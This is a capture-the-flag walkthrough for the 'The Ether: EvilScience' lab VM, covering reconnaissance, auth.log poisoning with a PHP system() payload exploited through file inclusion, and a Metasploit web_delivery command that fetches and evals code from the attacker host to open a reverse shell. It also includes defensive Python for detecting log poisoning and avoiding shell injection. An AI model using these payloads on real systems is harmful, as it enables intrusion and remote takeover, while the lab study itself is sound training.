The Ether: CTF walkthrough

Information

Name: The Ether: EvilScience

Date of release: 26 Oct 2017

Author: f1re_w1re

Series: The Ether

Web page: https://securityshards.wordpress.com/2017/10/26/the-ether-a-new-boot-2-root-hacking-challenge/

Note that the VM from VulnHub has issues. You have to download the VM from the author’s website.


Reconnaissance

We use arp-scan to find the IP address of the VM.

arp-scan

Then, we scan the VM for open ports and running services.

[email protected]:~# nmap -A -F 192.168.1.54

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-26 13:04 CET
Nmap scan report for theether-1.home (192.168.1.54)
Host is up (0.00074s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 12:09:bc:b1:5c:c9:bd:c3:ca:0f:b1:d5:c3:7d:98:1e (RSA)
|   256 de:77:4d:81:a0:93:da:00:53:3d:4a:30:bd:7e:35:7d (ECDSA)
|_  256 86:6c:7c:4b:04:7e:57:4f:68:16:a9:74:4c:0d:2f:56 (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: The Ether
MAC Address: 00:0C:29:44:E7:CF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.74 ms theether-1.home (192.168.1.54)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.61 seconds
[email protected]:~#


Remote Command Execution

After a few scans and some research with the OWASP ZAP tool, I found that we are able to read the content of the auth.log file, where SSH connection information is stored.

LFI

We can poison this log file with the following connection attempt.

[email protected]:~# ssh '<?php echo system($_GET['c']);?>'@192.168.1.54
<?php echo system($_GET[c]);?>@192.168.1.54's password: 
Permission denied, please try again.
<?php echo system($_GET[c]);?>@192.168.1.54's password: 
Permission denied, please try again.
<?php echo system($_GET[c]);?>@192.168.1.54's password: 
<?php echo system($_GET[c]);?>@192.168.1.54: Permission denied (publickey,password).
[email protected]:~#

Then, to check whether we have Remote Command Execution (RCE), we can run this query.

[email protected]:~# curl 'http://192.168.1.54/index.php?file=/var/log/auth.log&c=ls' -s | head

Nov 26 05:04:53 theEther sshd[2024]: Invalid user about.php
images
index.php
layout
licence.txt
research.php
xxxlogauditorxxx.py
xxxlogauditorxxx.py from 192.168.1.104
Nov 26 05:04:53 theEther sshd[2024]: input_userauth_request: invalid user about.php
(23) Failed writing body
[email protected]:~#
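The poisoning above works because sshd writes the attempted login name verbatim into auth.log and the vulnerable page includes that file as PHP. From the defender's side, the injected entry is easy to spot. The following is an added example (not code from the walkthrough or the VM) that parses "Invalid user" lines from constructed sample log text, modelled on the entries shown above, and flags usernames that carry server-side code markers or fall outside a conservative login-name allowlist.

```python
import re
from typing import Dict, List

# Constructed sample lines modelled on the sshd entries in the walkthrough;
# not copied from a real system.
SAMPLE_AUTH_LOG = """\
Nov 26 05:01:10 theEther sshd[1990]: Accepted password for evilscience from 192.168.1.104 port 50212 ssh2
Nov 26 05:04:53 theEther sshd[2024]: Invalid user <?php echo system($_GET[c]);?> from 192.168.1.104
Nov 26 05:04:53 theEther sshd[2024]: input_userauth_request: invalid user <?php echo system($_GET[c]);?> [preauth]
Nov 26 05:06:01 theEther sshd[2031]: Invalid user admin from 192.168.1.104
Nov 26 05:07:15 theEther sshd[2040]: Invalid user test from 10.0.0.7
"""

# Matches the "Invalid user <name> from <source>" form that sshd logs for
# unknown login names; the "input_userauth_request" variant is skipped so
# each attempt is counted once.
INVALID_USER_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[(?P<pid>\d+)\]: "
    r"Invalid user (?P<user>.*) from (?P<src>\S+)$"
)
# Conservative allowlist for a Linux login name; anything else is suspicious.
VALID_USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")
# Fragments that indicate an attempt to plant server-side code in the log.
CODE_MARKERS = ("<?", "?>", "<%", "$_GET", "$_POST", "$_REQUEST", "system(", "eval(")


def classify_username(user: str) -> str:
    """Return 'log-poisoning', 'malformed' or 'ok' for a logged login name."""
    if any(marker in user for marker in CODE_MARKERS):
        return "log-poisoning"
    if not VALID_USERNAME_RE.match(user):
        return "malformed"
    return "ok"


def scan_auth_log(text: str) -> List[Dict[str, str]]:
    """Return one finding per 'Invalid user' line whose username is not clean."""
    findings = []
    for line in text.splitlines():
        m = INVALID_USER_RE.match(line)
        if not m:
            continue
        verdict = classify_username(m.group("user"))
        if verdict != "ok":
            findings.append({"ts": m.group("ts"), "src": m.group("src"),
                             "user": m.group("user"), "verdict": verdict})
    return findings


if __name__ == "__main__":
    for f in scan_auth_log(SAMPLE_AUTH_LOG):
        print(f["verdict"], f["src"], repr(f["user"]))
```

The same rule set applies to any other log a web application might include, such as Apache access logs where the User-Agent is attacker-controlled.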


From RCE to Reverse Shell

For this CTF I will use the web_delivery exploit from the Metasploit Framework.

[email protected]:~# msfconsole -q -x 'use exploit/multi/script/web_delivery'
msf exploit(web_delivery) > show options 

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python


msf exploit(web_delivery) >

I changed the SRVPORT (the default 8080 is already used by OWASP ZAP), the PAYLOAD (PHP instead of Python), the LHOST and the TARGET (for a PHP payload) parameters.

msf exploit(web_delivery) > set TARGET 1
TARGET => 1
msf exploit(web_delivery) > set LHOST 192.168.1.104
LHOST => 192.168.1.104
msf exploit(web_delivery) > set SRVPORT 9090
SRVPORT => 9090
msf exploit(web_delivery) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(web_delivery) > run 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.104:4444 
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:9090/DBoQOU8UZc3Qfb
[*] Local IP: http://192.168.1.104:9090/DBoQOU8UZc3Qfb
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.104:9090/DBoQOU8UZc3Qfb'));"

msf exploit(web_delivery) >

Finally, we execute the PHP command to gain a reverse shell.

[email protected]:~# python 
Python 2.7.14 (default, Sep 17 2017, 18:50:44) 
[GCC 7.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import requests
>>> url = '''http://192.168.1.54/index.php?file=/var/log/auth.log&c=php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.104:9090/DBoQOU8UZc3Qfb'));"'''
>>> resp = requests.get(url)

Let’s get a TTY with low privilege.

Low privilege shell


Privilege Escalation

An odd Python script, xxxlogauditorxxx.py, can be found in the /var/www/html/theEther.com/public_html directory.

bash-4.3$ ls -la
ls -la
total 11312
drwxrwxr-x 4 root www-data        4096 Nov 23 19:44 .
drwxr-xr-x 5 root root            4096 Oct 23 18:31 ..
-rwxrwxr-x 1 root www-data        5891 Oct 23 19:27 about.php
drwxrwxr-x 3 root www-data        4096 Oct 23 18:02 images
-rwxrwxr-x 1 root www-data        6495 Oct 23 20:48 index.php
drwxrwxr-x 4 root www-data        4096 Oct 23 18:02 layout
-rwxrwxr-x 1 root www-data        5006 Oct 23 18:02 licence.txt
-rwxrwxr-x 1 root www-data       10641 Oct 23 19:26 research.php
-rwsrwsr-x 1 root evilscience 11527272 Nov 23 19:41 xxxlogauditorxxx.py
bash-4.3$

Moreover, we can execute this script with root privileges via sudo without a password.

sudo privileges

Plus, this script executes the cat command, so we are able to run any command we want with root privileges.
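The walkthrough does not show the script's source, so the following is a constructed illustration (added here, not the VM's code) of the pattern it describes: a root-run Python script that builds a shell string around cat, beside a hardened version that passes the path as an argument vector and checks it against an allowlist of auditable logs. The allowlist contents are an assumption.

```python
import subprocess

# Assumed allowlist of logs the auditor is meant to read; the real script's
# intent is not documented on the page.
ALLOWED_LOGS = frozenset({"/var/log/auth.log", "/var/log/apache2/access.log"})


def audit_log_unsafe(path: str) -> str:
    """Vulnerable pattern: the path is spliced into a shell command line, so
    shell metacharacters in `path` are interpreted by /bin/sh with the
    script's (root) privileges."""
    proc = subprocess.run("cat " + path, shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def audit_log_safe(path: str) -> str:
    """Hardened version: reject anything outside the allowlist, then invoke
    cat with an argument vector so the path is never parsed by a shell."""
    if path not in ALLOWED_LOGS:
        raise ValueError("not an auditable log: %r" % path)
    proc = subprocess.run(["cat", path], capture_output=True,
                          text=True, check=True)
    return proc.stdout


def is_rejected(path: str) -> bool:
    """True if the hardened auditor refuses the path."""
    try:
        audit_log_safe(path)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed input: a benign metacharacter payload that only echoes text.
    probe = "/dev/null; echo injected"
    print("unsafe ->", repr(audit_log_unsafe(probe)))
    print("safe rejects ->", is_rejected(probe))
```

Running the script as root through NOPASSWD sudo turns this one string concatenation into a full privilege escalation, which is why the sudo rule and the script's input handling both need fixing.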

Exploit PoC

We upload and execute a reverse shell on the system.

Root shell

We read the flag hidden in a PNG file.

The flag

Finally, we decode the base64 flag.

The flag decoded


